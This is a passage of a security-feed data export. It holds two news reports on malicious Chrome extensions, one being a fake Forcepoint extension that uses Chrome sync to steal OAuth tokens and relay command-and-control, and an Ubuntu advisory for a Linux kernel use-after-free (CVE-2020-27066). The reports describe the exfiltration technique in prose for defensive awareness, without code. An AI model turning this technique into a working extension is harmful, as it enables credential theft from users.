behind-the-scenes \u201cchat\u201d between the malicious extension and other web apps.\n\nA function called \u201cchrome.runtime.onConnectExternal.addListener,\u201d is provided by the Chrome browser to extensions. As its name suggests, it listens for when a connection to the browser is made from another extension. Meanwhile, a port object called \u201cport.onMessage.addListener,\u201d is employed, which allows for two-way communication between the extensions.\n\nThe extension then steals credentials \u2013 mail and oAuth tokens \u2013 from the victim\u2019s machine.\n\n\u201cThere is a switch that checks the value of parameter type in the received message,\u201d according to the analysis. \u201cNow an interesting thing happens: if the value of the type parameter is \u2018check_oauth_token_status,\u2019 the extension will verify if there is a key called \u2018oauth_token\u2019 in Chrome\u2019s storage. If it is there, it will send back (to the other extension) a message containing the value of the token with the status set to true, after which it will be deleted from Chrome\u2019s storage.\u201d\n\nIf the value of the type parameter is \u201csave_mailhighlight_token,\u201d the malicious extension will create a new key in Chrome\u2019s storage called email, which will be saved in Chrome\u2019s storage.\n\nThe extension also uses the \u201cchrome.storage.sync.get\u201d and \u201cchrome.storage.sync.save\u201d methods, so that all these values will be automatically synced to Google\u2019s cloud by Chrome, under the context of the user being logged in in Chrome. This provides an unusual exfiltration method.\n\n\u201cIn order to set, read or delete these keys, all the attacker has to do is log in with the same account to Google, in another Chrome browser (and this can be a throwaway account), and they can communicate with the Chrome browser in the victim\u2019s network by abusing Google\u2019s infrastructure,\u201d Zdrnja explained.\n\n## **A Novel Type of Cyberattack**\n\nAttackers can use this approach for exfiltrating data as well as C2 communications.\n\n\u201cWhile there are some limitations on size of data and amount of requests, this is actually perfect for C2 commands (which are generally small), or for stealing small, but sensitive data \u2013 such as authentication tokens,\u201d according to the researcher. \u201cIt will be slow because Chrome and Google throttle requests, allowing us to transfer 4 MB at a time.\u201d\n\nOverall, the attack is unusual and novel, he added: \u201cthere were also some things that I saw for the first time, which is why I think this particular exploitation is novel.\u201d\n\nTo protect their environments, admins should make sure that Chrome extensions are controlled, according to Zdrnja.\n\n\u201cGoogle allows you to do that through group policies so you can define exactly which extensions are allowed/approved and block everything else,\u201d he said.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "published": "2021-02-08T17:24:31", "modified": "2021-02-08T17:24:31", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://threatpost.com/fake-forcepoint-google-chrome-extension-hacks/163728/", "reporter": "Tara Seals", "references": ["https://threatpost.com/500-malicious-chrome-extensions-millions/152918/#:~:text=The%20malicious%20Chrome%20extensions%20were,them%20to%20malware%2Dlaced%20websites.&text=But%20researchers%20said%20that%20the,that%20also%20harvested%20browser%20data.", "https://threatpost.com/newsletter-sign/", "https://isc.sans.edu/diary/rss/27066", "https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook", "https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook"], "cvelist": [], "lastseen": "2021-02-08T17:53:09", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [], "modified": "2021-02-08T17:53:09", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-02-08T17:53:09", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": []}], "thn": [{"id": "THN:81E627A331EDA3D36991024F34DF933A", "hash": "14654800ecbb602b0ab2075a75ac94ed", "type": "thn", "bulletinFamily": "info", "title": "WARNING \u2014 Hugely Popular 'The Great Suspender' Chrome Extension Contains Malware", "description": "[](<https://thehackernews.com/images/-2lUrSJVxh4I/YB5vgYDx61I/AAAAAAAABs4/P1NLw-z_eGEDnIAlLnZhD6B2jXO9JHkTQCLcBGAsYHQ/s0/browser-hacking.jpg>)\n\nGoogle on Thursday removed **The Great Suspender**, a popular Chrome extension used by millions of users, from its Chrome Web Store for containing malware. It also took the unusual step of deactivating it from users' computers.\n\n\"This extension contains malware,\" [read](<https://github.com/greatsuspender/thegreatsuspender/issues/1304>) a terse notification from Google, but it has since emerged that the add-on stealthily added features that could be exploited to execute arbitrary code from a remote server, including tracking users online and committing advertising fraud.\n\n\"The old maintainer appears to have sold the extension to parties unknown, who have malicious intent to exploit the users of this extension in advertising fraud, tracking, and more,\" Calum McConnell [said](<https://github.com/greatsuspender/thegreatsuspender/issues/1263>) in a GitHub post.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\nThe extension, which had more than two million installs before it was disabled, would suspend tabs that aren't in use, replacing them with a blank gray screen until they were reloaded upon returning to the tabs in question.\n\nSigns of the extension's shady behavior had been going the rounds since November, leading Microsoft to [block the extension](<https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-735409569>) (v7.1.8) on Edge browsers last November.\n\nAccording to The Register, Dean Oemcke, the extension's original developer, is said to have [sold the extension](<https://www.theregister.com/2021/01/07/great_suspender_malware/>) in June 2020 to an unknown entity, following which two new versions were released directly to users via the Chrome Web Store (7.1.8 and 7.1.9).\n\nUsers of the extension can recover the tabs using a workaround [here](<https://github.com/greatsuspender/thegreatsuspender/issues/526>), or as an alternative, can also use the latest version available on GitHub ([v7.1.6](<https://github.com/greatsuspender/thegreatsuspender/releases/tag/v7.1.6>)) by enabling Chrome Developer mode.\n\nBut turning on the Developer mode can have other consequences, too, as revealed by security researcher Bojan Zdrnja, who disclosed a novel method that lets threat actors abuse the [Chrome sync feature](<https://support.google.com/chrome/answer/185277?co=GENIE.Platform%3DDesktop&hl=en-GB>) to bypass firewalls and establish connections to attacker-controlled servers for data exfiltration.\n\nZdrnja said the adversary created a malicious security add-on that masqueraded as Forcepoint Endpoint Chrome Extension for Windows, which was then installed directly on the browser after enabling Developer mode.\n\n\"While there are some limitations on size of data and amount of requests, this is actually perfect for C&amp;C commands (which are generally small), or for stealing small, but sensitive data \u2013 such as authentication tokens,\" Zdrnja [said](<https://isc.sans.edu/diary/27066>).\n\nBut given that this attack requires [physical access](<https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#Why-arent-physically_local-attacks-in-Chromes-threat-model>) to a target system, it is unlikely to be resolved by Google.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-02-06T10:30:00", "modified": "2021-02-06T10:30:56", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://thehackernews.com/2021/02/warning-hugely-popular-great-suspender.html", "reporter": "The Hacker News", "references": [], "cvelist": [], "lastseen": "2021-02-06T11:13:40", "history": [], "viewCount": 64, "enchantments": {"dependencies": {"references": [], "modified": "2021-02-06T11:13:40", "rev": 2}, "score": {"value": 1.3, "vector": "NONE", "modified": "2021-02-06T11:13:40", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": []}], "ubuntucve": [{"id": "UB:CVE-2020-27066", "hash": "91c67b4317fe96baeb884dd6bdfd4023", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible\nuse after free due to improper locking. This could lead to local escalation\nof privilege with System execution privileges needed. User interaction is\nnot needed for exploitation.Product: AndroidVersions: Android kernelAndroid\nID: A-168043318\n\n#### Bugs\n\n * <https://bugzilla.suse.com/show_bug.cgi?id=1180098>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | unclear what issue/kernel commit google is referencing here.\n", "published": "2020-12-15T00:00:00", "modified": "2020-12-15T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "href": "https://ubuntu.com/security/CVE-2020-27066", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27066", "https://source.android.com/security/bulletin/pixel/2020-12-01", "https://nvd.nist.gov/vuln/detail/CVE-2020-27066", "https://launchpad.net/bugs/cve/CVE-2020-27066", "https://security-tracker.debian.org/tracker/CVE-2020-27066"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-07-30T21:37:25", "history": [{"bulletin": {"id": "UB:CVE-2020-27066", "hash": "5f8f2aede2b0e8b9727dbe6829fd3a72", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2020-27066", "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible\nuse after free due to improper locking. This could lead to local escalation\nof privilege with System execution privileges needed. User interaction is\nnot needed for exploitation.Product: AndroidVersions: Android kernelAndroid\nID: A-168043318\n\n#### Bugs\n\n * <https://bugzilla.suse.com/show_bug.cgi?id=1180098>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | unclear what issue/kernel commit google is referencing here.\n", "published": "2020-12-15T00:00:00", "modified": "2020-12-15T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2020-27066", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27066", "https://source.android.com/security/bulletin/pixel/2020-12-01", "https://nvd.nist.gov/vuln/detail/CVE-2020-27066", "https://launchpad.net/bugs/cve/CVE-2020-27066", "https://security-tracker.debian.org/tracker/CVE-2020-27066"], "cvelist": ["CVE-2020-27066"], "immutableFields": [], "lastseen": "2021-06-30T21:30:42", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-27066"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-27066"]}], "modified": "2021-06-30T21:30:42", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-06-30T21:30:42", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-99.100", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-179.209", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1066.70", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1107.118", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-5.0"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-hwe"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1066.70~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-hwe"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1082.92~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-4.15"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-edge"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-dell300x"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1061.65", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-4.15"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-edge"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-4.15"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-4.15"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.0"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.0"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "5.3.0-1020.22~18.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gkeop"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gkeop-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-99.100~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe-5.8"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-hwe-edge"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-kvm"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1059.60", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-kvm"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1071.78", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-kvm"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-lts-trusty"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-lts-xenial"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-lts-xenial"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-5.10"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-5.6"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-osp1"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oem-osp1"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1038.42", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1038.42~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle-5.0"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-oracle-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1061.65", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1133.142", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2-5.3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "5.3.0-1026.28~18.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-raspi2-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-riscv"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-riscv"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-snapdragon"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1077.84", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-snapdragon"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1137.145", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-snapdragon"}], "bugs": ["https://bugzilla.suse.com/show_bug.cgi?id=1180098"]}, "lastseen": "2021-06-30T21:30:42", "differentElements": ["cvss2", "cvss3"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-27066"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-27066"]}], "modified": "2021-07-30T21:37:25", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-07-30T21:37:25", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-99.100", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-179.209", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "4.15.0-1066.70", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.4.0-1107.118", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-5.0"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-hwe"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1066.70~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-aws-hwe"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1082.92~16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-4.15"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-azure-edge"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-dell300x"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "4.15.0-1061.65", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-4.15"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-5.3"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-5.4"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gcp-edge"}, {"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.6", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-4.15"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "linux-gke-4.15"}, {"OS": "ubuntu", 